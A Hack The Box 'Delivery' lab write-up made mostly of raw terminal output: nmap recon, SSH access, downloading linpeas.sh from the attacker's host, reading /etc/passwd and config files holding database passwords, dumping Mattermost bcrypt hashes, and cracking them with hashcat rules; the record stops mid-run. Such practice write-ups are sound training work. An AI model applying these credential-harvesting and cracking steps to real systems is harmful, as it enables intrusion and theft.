delivery

Dec 10, 2020 TJNull's List
Share on:

delivery

Introduction:

Recon

nmap -sS -sC -sV -T4 -O -oN nmap.delivery.txt 10.10.10.222 Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-10 18:42 EST Nmap scan report for 10.10.10.222 Host is up (0.014s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 9c:40:fa:85:9b:01:ac:ac:0e:bc:0c:19:51:8a:ee:27 (RSA) | 256 5a:0c:c0:3b:9b:76:55:2e:6e:c4:f4:b9:5d:76:17:09 (ECDSA) |_ 256 b7:9d:f7:48:9d:a2:f2:76:30:fd:42:d3:35:3a:80:8c (ED25519) 80/tcp open http nginx 1.14.2 |_http-server-header: nginx/1.14.2 |_http-title: Welcome No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=1/10%OT=22%CT=1%CU=43575%PV=Y%DS=2%DC=I%G=Y%TM=5FFB90D OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1 OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S)

Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds

Enter your target IP address or URL here: 10.10.10.222

Scanning target 10.10.10.222 Time started: 2021-01-10 18:42:42.506364

Port 22 is open Port 80 is open Port 8065 is open Port scan completed in 0:00:06.923810

nginx/1.14.2 Mattermost running on port 8065 Helpdesk running on helpdesk.delivery.htb

Enumeration

Exploitation

eneloop@kinetic:~$ ssh [email protected] [email protected]’s password: Linux Delivery 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Jan 5 06:09:50 2021 from 10.10.14.5 maildeliverer@Delivery:~$

Post-exploit/PrivEsc

–2021-01-31 10:49:20– http://10.10.14.38:8000/linpeas.sh Connecting to 10.10.14.38:8000… connected. HTTP request sent, awaiting response… 200 OK Length: 313316 (306K) [text/x-sh] Saving to: ‘linpeas.sh’

linpeas.sh 100%[=========================================================================================================================================>] 305.97K –.-KB/s in 0.09s

2021-01-31 10:49:21 (3.50 MB/s) - ‘linpeas.sh’ saved [313316/313316]

maildeliverer@Delivery:/tmp$ chmod 755 linpeas.sh maildeliverer@Delivery:/tmp$ id uid=1000(maildeliverer) gid=1000(maildeliverer) groups=1000(maildeliverer) maildeliverer@Delivery:/tmp$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin avahi:x:106:115:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin saned:x:107:116::/var/lib/saned:/usr/sbin/nologin colord:x:108:117:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin hplip:x:109:7:HPLIP system user,,,:/var/run/hplip:/bin/false maildeliverer:x:1000:1000:MailDeliverer,,,:/home/maildeliverer:/bin/bash systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:110:118:MySQL Server,,,:/nonexistent:/bin/false mattermost:x:998:998::/home/mattermost:/bin/sh maildeliverer@Delivery:/tmp$

#Default admin email. Used only on db connection issues and related alerts. define(‘ADMIN_EMAIL’,‘[email protected]’);

Database Options

—————————————————

Mysql Login info

define(‘DBTYPE’,‘mysql’); define(‘DBHOST’,‘localhost’); define(‘DBNAME’,‘osticket’); define(‘DBUSER’,‘ost_user’); define(‘DBPASS’,'!H3lpD3sk123!');

Table prefix

define(‘TABLE_PREFIX’,‘ost_');

}maildeliverer@Delivery:/opt/mattermost/config$ pwd /opt/mattermost/config maildeliverer@Delivery:/opt/mattermost/config$ cat config.json { “ServiceSettings”: { “SiteURL”: “”, “WebsocketURL”: “”, “LicenseFileLocation”: “”, “ListenAddress”: “:8065”, “ConnectionSecurity”: “”, “TLSCertFile”: “”, “TLSKeyFile”: “”, “TLSMinVer”: “1.2”, “TLSStrictTransport”: false, “TLSStrictTransportMaxAge”: 63072000, “TLSOverwriteCiphers”: [], “UseLetsEncrypt”: false, “LetsEncryptCertificateCacheFile”: “./config/letsencrypt.cache”, “Forward80To443”: false, “TrustedProxyIPHeader”: [], “ReadTimeout”: 300, “WriteTimeout”: 300, “IdleTimeout”: 60, “MaximumLoginAttempts”: 10, “GoroutineHealthThreshold”: -1, “GoogleDeveloperKey”: “”, “EnableOAuthServiceProvider”: false, “EnableIncomingWebhooks”: true, “EnableOutgoingWebhooks”: true, “EnableCommands”: true, “EnableOnlyAdminIntegrations”: true, “EnablePostUsernameOverride”: false, “EnablePostIconOverride”: false, “EnableLinkPreviews”: true, “EnableTesting”: false, “EnableDeveloper”: false, “EnableOpenTracing”: false, “EnableSecurityFixAlert”: true, “EnableInsecureOutgoingConnections”: false, “AllowedUntrustedInternalConnections”: “”, “EnableMultifactorAuthentication”: false, “EnforceMultifactorAuthentication”: false, “EnableUserAccessTokens”: false, “AllowCorsFrom”: “”, “CorsExposedHeaders”: “”, “CorsAllowCredentials”: false, “CorsDebug”: false, “AllowCookiesForSubdomains”: false, “ExtendSessionLengthWithActivity”: true, “SessionLengthWebInDays”: 30, “SessionLengthMobileInDays”: 30, “SessionLengthSSOInDays”: 30, “SessionCacheInMinutes”: 10, “SessionIdleTimeoutInMinutes”: 43200, “WebsocketSecurePort”: 443, “WebsocketPort”: 80, “WebserverMode”: “gzip”, “EnableCustomEmoji”: true, “EnableEmojiPicker”: true, “EnableGifPicker”: true, “GfycatApiKey”: “2_KtH_W5”, “GfycatApiSecret”: “3wLVZPiswc3DnaiaFoLkDvB4X0IV6CpMkj4tf2inJRsBY6-FnkT08zGmppWFgeof”, “RestrictCustomEmojiCreation”: “all”, “RestrictPostDelete”: “all”, “AllowEditPost”: “always”, “PostEditTimeLimit”: -1, “TimeBetweenUserTypingUpdatesMilliseconds”: 5000, “EnablePostSearch”: true, “MinimumHashtagLength”: 3, “EnableUserTypingMessages”: true, “EnableChannelViewedMessages”: true, “EnableUserStatuses”: true, “ExperimentalEnableAuthenticationTransfer”: true, “ClusterLogTimeoutMilliseconds”: 2000, “CloseUnusedDirectMessages”: false, “EnablePreviewFeatures”: true, “EnableTutorial”: true, “ExperimentalEnableDefaultChannelLeaveJoinMessages”: true, “ExperimentalGroupUnreadChannels”: “disabled”, “ExperimentalChannelOrganization”: false, “ExperimentalChannelSidebarOrganization”: “disabled”, “ExperimentalDataPrefetch”: true, “ImageProxyType”: “”, “ImageProxyURL”: “”, “ImageProxyOptions”: “”, “EnableAPITeamDeletion”: false, “EnableAPIUserDeletion”: false, “ExperimentalEnableHardenedMode”: false, “DisableLegacyMFA”: true, “ExperimentalStrictCSRFEnforcement”: false, “EnableEmailInvitations”: false, “DisableBotsWhenOwnerIsDeactivated”: true, “EnableBotAccountCreation”: false, “EnableSVGs”: false, “EnableLatex”: false, “EnableAPIChannelDeletion”: false, “EnableLocalMode”: false, “LocalModeSocketLocation”: “/var/tmp/mattermost_local.socket”, “EnableAWSMetering”: false, “SplitKey”: “”, “FeatureFlagSyncIntervalSeconds”: 30, “DebugSplit”: false, “ThreadAutoFollow”: true, “ManagedResourcePaths”: "" }, “TeamSettings”: { “SiteName”: “Mattermost”, “MaxUsersPerTeam”: 5000, “EnableTeamCreation”: true, “EnableUserCreation”: true, “EnableOpenServer”: true, “EnableUserDeactivation”: false, “RestrictCreationToDomains”: “”, “EnableCustomBrand”: false, “CustomBrandText”: “”, “CustomDescriptionText”: “”, “RestrictDirectMessage”: “any”, “RestrictTeamInvite”: “all”, “RestrictPublicChannelManagement”: “all”, “RestrictPrivateChannelManagement”: “all”, “RestrictPublicChannelCreation”: “all”, “RestrictPrivateChannelCreation”: “all”, “RestrictPublicChannelDeletion”: “all”, “RestrictPrivateChannelDeletion”: “all”, “RestrictPrivateChannelManageMembers”: “all”, “EnableXToLeaveChannelsFromLHS”: false, “UserStatusAwayTimeout”: 300, “MaxChannelsPerTeam”: 2000, “MaxNotificationsPerChannel”: 1000000, “EnableConfirmNotificationsToChannel”: true, “TeammateNameDisplay”: “username”, “ExperimentalViewArchivedChannels”: true, “ExperimentalEnableAutomaticReplies”: false, “ExperimentalHideTownSquareinLHS”: false, “ExperimentalTownSquareIsReadOnly”: false, “LockTeammateNameDisplay”: false, “ExperimentalPrimaryTeam”: “”, “ExperimentalDefaultChannels”: [] }, “ClientRequirements”: { “AndroidLatestVersion”: “”, “AndroidMinVersion”: “”, “DesktopLatestVersion”: “”, “DesktopMinVersion”: “”, “IosLatestVersion”: “”, “IosMinVersion”: "" }, “SqlSettings”: { “DriverName”: “mysql”, “DataSource”: “mmuser:Crack_The_MM_Admin_PW@tcp(127.0.0.1:3306)/mattermost?charset=utf8mb4,utf8\u0026readTimeout=30s\u0026writeTimeout=30s”, “DataSourceReplicas”: [], “DataSourceSearchReplicas”: [], “MaxIdleConns”: 20, “ConnMaxLifetimeMilliseconds”: 3600000, “MaxOpenConns”: 300, “Trace”: false, “AtRestEncryptKey”: “n5uax3d4f919obtsp1pw1k5xetq1enez”, “QueryTimeout”: 30, “DisableDatabaseSearch”: false }, “LogSettings”: { “EnableConsole”: true, “ConsoleLevel”: “INFO”, “ConsoleJson”: true, “EnableFile”: true, “FileLevel”: “INFO”, “FileJson”: true, “FileLocation”: “”, “EnableWebhookDebugging”: true, “EnableDiagnostics”: true, “EnableSentry”: true, “AdvancedLoggingConfig”: "" }, “ExperimentalAuditSettings”: { “FileEnabled”: false, “FileName”: “”, “FileMaxSizeMB”: 100, “FileMaxAgeDays”: 0, “FileMaxBackups”: 0, “FileCompress”: false, “FileMaxQueueSize”: 1000, “AdvancedLoggingConfig”: "" }, “NotificationLogSettings”: { “EnableConsole”: true, “ConsoleLevel”: “INFO”, “ConsoleJson”: true, “EnableFile”: true, “FileLevel”: “INFO”, “FileJson”: true, “FileLocation”: “”, “AdvancedLoggingConfig”: "" }, “PasswordSettings”: { “MinimumLength”: 10, “Lowercase”: true, “Number”: true, “Uppercase”: true, “Symbol”: true }, “FileSettings”: { “EnableFileAttachments”: true, “EnableMobileUpload”: true, “EnableMobileDownload”: true, “MaxFileSize”: 52428800, “DriverName”: “local”, “Directory”: “./data/”, “EnablePublicLink”: false, “PublicLinkSalt”: “8818u8uiz1n9rykuwgiqttfzgu6iixhz”, “InitialFont”: “nunito-bold.ttf”, “AmazonS3AccessKeyId”: “”, “AmazonS3SecretAccessKey”: “”, “AmazonS3Bucket”: “”, “AmazonS3PathPrefix”: “”, “AmazonS3Region”: “”, “AmazonS3Endpoint”: “s3.amazonaws.com”, “AmazonS3SSL”: true, “AmazonS3SignV2”: false, “AmazonS3SSE”: false, “AmazonS3Trace”: false }, “EmailSettings”: { “EnableSignUpWithEmail”: true, “EnableSignInWithEmail”: true, “EnableSignInWithUsername”: true, “SendEmailNotifications”: false, “UseChannelInEmailNotifications”: false, “RequireEmailVerification”: true, “FeedbackName”: “”, “FeedbackEmail”: “”, “ReplyToAddress”: “”, “FeedbackOrganization”: “”, “EnableSMTPAuth”: false, “SMTPUsername”: “”, “SMTPPassword”: “”, “SMTPServer”: “localhost”, “SMTPPort”: “1025”, “SMTPServerTimeout”: 10, “ConnectionSecurity”: “”, “SendPushNotifications”: true, “PushNotificationServer”: “https://push-test.mattermost.com”, “PushNotificationContents”: “full”, “PushNotificationBuffer”: 1000, “EnableEmailBatching”: false, “EmailBatchingBufferSize”: 256, “EmailBatchingInterval”: 30, “EnablePreviewModeBanner”: true, “SkipServerCertificateVerification”: false, “EmailNotificationContentsType”: “full”, “LoginButtonColor”: “#0000”, “LoginButtonBorderColor”: “#2389D7”, “LoginButtonTextColor”: “#2389D7” }, “RateLimitSettings”: { “Enable”: false, “PerSec”: 10, “MaxBurst”: 100, “MemoryStoreSize”: 10000, “VaryByRemoteAddr”: true, “VaryByUser”: false, “VaryByHeader”: "" }, “PrivacySettings”: { “ShowEmailAddress”: true, “ShowFullName”: true }, “SupportSettings”: { “TermsOfServiceLink”: “https://about.mattermost.com/default-terms/", “PrivacyPolicyLink”: “https://about.mattermost.com/default-privacy-policy/", “AboutLink”: “https://about.mattermost.com/default-about/", “HelpLink”: “https://about.mattermost.com/default-help/", “ReportAProblemLink”: “https://about.mattermost.com/default-report-a-problem/", “SupportEmail”: “[email protected]”, “CustomTermsOfServiceEnabled”: false, “CustomTermsOfServiceReAcceptancePeriod”: 365, “EnableAskCommunityLink”: true }, “AnnouncementSettings”: { “EnableBanner”: false, “BannerText”: “”, “BannerColor”: “#f2a93b”, “BannerTextColor”: “#333333”, “AllowBannerDismissal”: true, “AdminNoticesEnabled”: true, “UserNoticesEnabled”: true, “NoticesURL”: “https://notices.mattermost.com/", “NoticesFetchFrequency”: 3600, “NoticesSkipCache”: false }, “ThemeSettings”: { “EnableThemeSelection”: true, “DefaultTheme”: “default”, “AllowCustomThemes”: true, “AllowedThemes”: [] }, “GitLabSettings”: { “Enable”: false, “Secret”: “”, “Id”: “”, “Scope”: “”, “AuthEndpoint”: “”, “TokenEndpoint”: “”, “UserApiEndpoint”: "” }, “GoogleSettings”: { “Enable”: false, “Secret”: “”, “Id”: “”, “Scope”: “profile email”, “AuthEndpoint”: “https://accounts.google.com/o/oauth2/v2/auth", “TokenEndpoint”: “https://www.googleapis.com/oauth2/v4/token", “UserApiEndpoint”: “https://people.googleapis.com/v1/people/me?personFields=names,emailAddresses,nicknames,metadata" }, “Office365Settings”: { “Enable”: false, “Secret”: “”, “Id”: “”, “Scope”: “User.Read”, “AuthEndpoint”: “https://login.microsoftonline.com/common/oauth2/v2.0/authorize", “TokenEndpoint”: “https://login.microsoftonline.com/common/oauth2/v2.0/token", “UserApiEndpoint”: “https://graph.microsoft.com/v1.0/me", “DirectoryId”: "” }, “LdapSettings”: { “Enable”: false, “EnableSync”: false, “LdapServer”: “”, “LdapPort”: 389, “ConnectionSecurity”: “”, “BaseDN”: “”, “BindUsername”: “”, “BindPassword”: “”, “UserFilter”: “”, “GroupFilter”: “”, “GuestFilter”: “”, “EnableAdminFilter”: false, “AdminFilter”: “”, “GroupDisplayNameAttribute”: “”, “GroupIdAttribute”: “”, “FirstNameAttribute”: “”, “LastNameAttribute”: “”, “EmailAttribute”: “”, “UsernameAttribute”: “”, “NicknameAttribute”: “”, “IdAttribute”: “”, “PositionAttribute”: “”, “LoginIdAttribute”: “”, “PictureAttribute”: “”, “SyncIntervalMinutes”: 60, “SkipCertificateVerification”: false, “PublicCertificateFile”: “”, “PrivateKeyFile”: “”, “QueryTimeout”: 60, “MaxPageSize”: 0, “LoginFieldName”: “”, “LoginButtonColor”: “#0000”, “LoginButtonBorderColor”: “#2389D7”, “LoginButtonTextColor”: “#2389D7”, “Trace”: false }, “ComplianceSettings”: { “Enable”: false, “Directory”: “./data/”, “EnableDaily”: false }, “LocalizationSettings”: { “DefaultServerLocale”: “en”, “DefaultClientLocale”: “en”, “AvailableLocales”: "” }, “SamlSettings”: { “Enable”: false, “EnableSyncWithLdap”: false, “EnableSyncWithLdapIncludeAuth”: false, “IgnoreGuestsLdapSync”: false, “Verify”: true, “Encrypt”: true, “SignRequest”: false, “IdpUrl”: “”, “IdpDescriptorUrl”: “”, “IdpMetadataUrl”: “”, “ServiceProviderIdentifier”: “”, “AssertionConsumerServiceURL”: “”, “SignatureAlgorithm”: “RSAwithSHA1”, “CanonicalAlgorithm”: “Canonical1.0”, “ScopingIDPProviderId”: “”, “ScopingIDPName”: “”, “IdpCertificateFile”: “”, “PublicCertificateFile”: “”, “PrivateKeyFile”: “”, “IdAttribute”: “”, “GuestAttribute”: “”, “EnableAdminAttribute”: false, “AdminAttribute”: “”, “FirstNameAttribute”: “”, “LastNameAttribute”: “”, “EmailAttribute”: “”, “UsernameAttribute”: “”, “NicknameAttribute”: “”, “LocaleAttribute”: “”, “PositionAttribute”: “”, “LoginButtonText”: “SAML”, “LoginButtonColor”: “#34a28b”, “LoginButtonBorderColor”: “#2389D7”, “LoginButtonTextColor”: “#ffffff” }, “NativeAppSettings”: { “AppDownloadLink”: “https://mattermost.com/download/#mattermostApps", “AndroidAppDownloadLink”: “https://about.mattermost.com/mattermost-android-app/", “IosAppDownloadLink”: “https://about.mattermost.com/mattermost-ios-app/" }, “ClusterSettings”: { “Enable”: false, “ClusterName”: “”, “OverrideHostname”: “”, “NetworkInterface”: “”, “BindAddress”: “”, “AdvertiseAddress”: “”, “UseIpAddress”: true, “UseExperimentalGossip”: false, “EnableExperimentalGossipEncryption”: false, “ReadOnlyConfig”: true, “GossipPort”: 8074, “StreamingPort”: 8075, “MaxIdleConns”: 100, “MaxIdleConnsPerHost”: 128, “IdleConnTimeoutMilliseconds”: 90000 }, “MetricsSettings”: { “Enable”: false, “BlockProfileRate”: 0, “ListenAddress”: “:8067” }, “ExperimentalSettings”: { “ClientSideCertEnable”: false, “ClientSideCertCheck”: “secondary”, “EnableClickToReply”: false, “LinkMetadataTimeoutMilliseconds”: 5000, “RestrictSystemAdmin”: false, “UseNewSAMLLibrary”: false, “CloudUserLimit”: 0, “CloudBilling”: false, “EnableSharedChannels”: false }, “AnalyticsSettings”: { “MaxUsersForStatistics”: 2500 }, “ElasticsearchSettings”: { “ConnectionUrl”: “http://localhost:9200”, “Username”: “elastic”, “Password”: “changeme”, “EnableIndexing”: false, “EnableSearching”: false, “EnableAutocomplete”: false, “Sniff”: true, “PostIndexReplicas”: 1, “PostIndexShards”: 1, “ChannelIndexReplicas”: 1, “ChannelIndexShards”: 1, “UserIndexReplicas”: 1, “UserIndexShards”: 1, “AggregatePostsAfterDays”: 365, “PostsAggregatorJobStartTime”: “03:00”, “IndexPrefix”: “”, “LiveIndexingBatchSize”: 1, “BulkIndexingTimeWindowSeconds”: 3600, “RequestTimeoutSeconds”: 30, “SkipTLSVerification”: false, “Trace”: "” }, “BleveSettings”: { “IndexDir”: “”, “EnableIndexing”: false, “EnableSearching”: false, “EnableAutocomplete”: false, “BulkIndexingTimeWindowSeconds”: 3600 }, “DataRetentionSettings”: { “EnableMessageDeletion”: false, “EnableFileDeletion”: false, “MessageRetentionDays”: 365, “FileRetentionDays”: 365, “DeletionJobStartTime”: “02:00” }, “MessageExportSettings”: { “EnableExport”: false, “ExportFormat”: “actiance”, “DailyRunTime”: “01:00”, “ExportFromTimestamp”: 0, “BatchSize”: 10000, “DownloadExportResults”: false, “GlobalRelaySettings”: { “CustomerType”: “A9”, “SmtpUsername”: “”, “SmtpPassword”: “”, “EmailAddress”: “”, “SMTPServerTimeout”: 1800 } }, “JobSettings”: { “RunJobs”: true, “RunScheduler”: true }, “PluginSettings”: { “Enable”: true, “EnableUploads”: false, “AllowInsecureDownloadUrl”: false, “EnableHealthCheck”: true, “Directory”: “./plugins”, “ClientDirectory”: “./client/plugins”, “Plugins”: {}, “PluginStates”: { “com.mattermost.nps”: { “Enable”: true }, “com.mattermost.plugin-channel-export”: { “Enable”: true }, “com.mattermost.plugin-incident-management”: { “Enable”: true } }, “EnableMarketplace”: true, “EnableRemoteMarketplace”: true, “AutomaticPrepackagedPlugins”: true, “RequirePluginSignature”: false, “MarketplaceUrl”: “https://api.integrations.mattermost.com”, “SignaturePublicKeyFiles”: [] }, “DisplaySettings”: { “CustomUrlSchemes”: [], “ExperimentalTimezone”: true }, “GuestAccountsSettings”: { “Enable”: false, “AllowEmailAccounts”: true, “EnforceMultifactorAuthentication”: false, “RestrictCreationToDomains”: "” }, “ImageProxySettings”: { “Enable”: false, “ImageProxyType”: “local”, “RemoteImageProxyURL”: “”, “RemoteImageProxyOptions”: "” }, “CloudSettings”: { “CWSUrl”: “https://customers.mattermost.com” } }maildeliverer@Delivery:/opt/mattermost/config$

maildeliverer@Delivery:/opt/mattermost/config$ mysql -u mmuser -p -D mattermost Enter password: Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor. Commands end with ; or \g. Your MariaDB connection id is 81 Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the current input statement.

MariaDB [mattermost]> show tables; +————————+ | Tables_in_mattermost | +————————+ | Audits | | Bots | | ChannelMemberHistory | | ChannelMembers | | Channels | | ClusterDiscovery | | CommandWebhooks | | Commands | | Compliances | | Emoji | | FileInfo | | GroupChannels | | GroupMembers | | GroupTeams | | IncomingWebhooks | | Jobs | | Licenses | | LinkMetadata | | OAuthAccessData | | OAuthApps | | OAuthAuthData | | OutgoingWebhooks | | PluginKeyValueStore | | Posts | | Preferences | | ProductNoticeViewState | | PublicChannels | | Reactions | | Roles | | Schemes | | Sessions | | SidebarCategories | | SidebarChannels | | Status | | Systems | | TeamMembers | | Teams | | TermsOfService | | ThreadMemberships | | Threads | | Tokens | | UploadSessions | | UserAccessTokens | | UserGroups | | UserTermsOfService | | Users | +————————+ 46 rows in set (0.001 sec)

MariaDB [mattermost]> desc users; ERROR 1146 (42S02): Table ‘mattermost.users’ doesn’t exist MariaDB [mattermost]> sesc Users -> ; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘sesc Users’ at line 1 MariaDB [mattermost]> describe Users; +——————–+————–+——+—–+———+——-+ | Field | Type | Null | Key | Default | Extra | +——————–+————–+——+—–+———+——-+ | Id | varchar(26) | NO | PRI | NULL | | | CreateAt | bigint(20) | YES | MUL | NULL | | | UpdateAt | bigint(20) | YES | MUL | NULL | | | DeleteAt | bigint(20) | YES | MUL | NULL | | | Username | varchar(64) | YES | UNI | NULL | | | Password | varchar(128) | YES | | NULL | | | AuthData | varchar(128) | YES | UNI | NULL | | | AuthService | varchar(32) | YES | | NULL | | | Email | varchar(128) | YES | UNI | NULL | | | EmailVerified | tinyint(1) | YES | | NULL | | | Nickname | varchar(64) | YES | | NULL | | | FirstName | varchar(64) | YES | | NULL | | | LastName | varchar(64) | YES | | NULL | | | Position | varchar(128) | YES | | NULL | | | Roles | text | YES | | NULL | | | AllowMarketing | tinyint(1) | YES | | NULL | | | Props | text | YES | | NULL | | | NotifyProps | text | YES | | NULL | | | LastPasswordUpdate | bigint(20) | YES | | NULL | | | LastPictureUpdate | bigint(20) | YES | | NULL | | | FailedAttempts | int(11) | YES | | NULL | | | Locale | varchar(5) | YES | | NULL | | | Timezone | text | YES | | NULL | | | MfaActive | tinyint(1) | YES | | NULL | | | MfaSecret | varchar(128) | YES | | NULL | | +——————–+————–+——+—–+———+——-+ 25 rows in set (0.001 sec)

MariaDB [mattermost]> select Username,Password from Users; +———————————-+————————————————————–+ | Username | Password | +———————————-+————————————————————–+ | surveybot | | | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | | enp | $2a$10$6Uc2Om6TCrk9ts.aVY6L5.giMnMvdMREoDOrpqGJB6.Omp90R9SlW | | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | | channelexport | | | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | +———————————-+————————————————————–+ 8 rows in set (0.000 sec)

MariaDB [mattermost]>

eneloop@kinetic:~$ hashid ‘$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO ' Analyzing ‘$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO’ [+] Blowfish(OpenBSD) [+] Woltlab Burning Board 4.x [+] bcrypt eneloop@kinetic:~$

https://www.4armed.com/blog/hashcat-rule-based-attack/

eneloop@kinetic:…/lab/hackthebox/delivery$ hashcat -r /usr/share/hashcat/rules/best64.rule –stdout passwords.txt PleaseSubscribe! !ebircsbuSesaelP PLEASESUBSCRIBE! pleaseSubscribe! PleaseSubscribe!0 PleaseSubscribe!1 PleaseSubscribe!2 PleaseSubscribe!3 PleaseSubscribe!4 PleaseSubscribe!5 PleaseSubscribe!6 PleaseSubscribe!7 PleaseSubscribe!8 PleaseSubscribe!9 PleaseSubscribe!00 PleaseSubscribe!01 PleaseSubscribe!02 PleaseSubscribe!11 PleaseSubscribe!12 PleaseSubscribe!13 PleaseSubscribe!21 PleaseSubscribe!22 PleaseSubscribe!23 PleaseSubscribe!69 PleaseSubscribe!77 PleaseSubscribe!88 PleaseSubscribe!99 PleaseSubscribe!123 PleaseSubscribe!e PleaseSubscribe!s PleaseSubscribea PleaseSubscribs PleaseSubscriba PleaseSubscriber PleaseSubscribie PleaseSubscrio PleaseSubscriy PleaseSubscri123 PleaseSubscriman PleaseSubscridog 1PleaseSubscribe! thePleaseSubscribe! dleaseSubscribe! maeaseSubscribe! PleaseSubscribe! PleaseSubscr1be! Pl3as3Subscrib3! PlaseSubscribe! PlseSubscribe! PleseSubscribe! PleaeSubscribe! Ples Pleas1 PleaseSubscribe PleaseSubscrib PleaseSubscri PleaseSubscriPleaseSubscri PeaseSubscri ribe bscribe!easeSu PleaseSubscri! dleaseSubscrib be!PleaseSubscri ibe! ribe! cribcrib tlea asPasP XleaseSubscribe! SaseSubscribe! PleaSu PlesPles asP PlcrPlcr PcSu PleasS PeSubs eneloop@kinetic:…/lab/hackthebox/delivery$ hashcat -r /usr/share/hashcat/rules/best64.rule –stdout passwords.txt > passwords-hashcat.txt eneloop@kinetic:…/lab/hackthebox/delivery$

eneloop@kinetic:…/lab/hackthebox/delivery$ cat hashes.txt $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO eneloop@kinetic:…/lab/hackthebox/delivery$

eneloop@kinetic:…/lab/hackthebox/delivery$ hashcat -m 3200 -a 0 hashes.txt passwords-hashcat.txt hashcat (v6.1.1) starting…

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]

  • Device #1: pthread-Intel(R) Core(TM) i7-7700K CPU @ 4.20GHz, 5851/5915 MB (2048 MB allocatable), 4MCU

Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 72

Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1

Applicable optimizers applied:

  • Zero-Byte
  • Single-Hash
  • Single-Salt

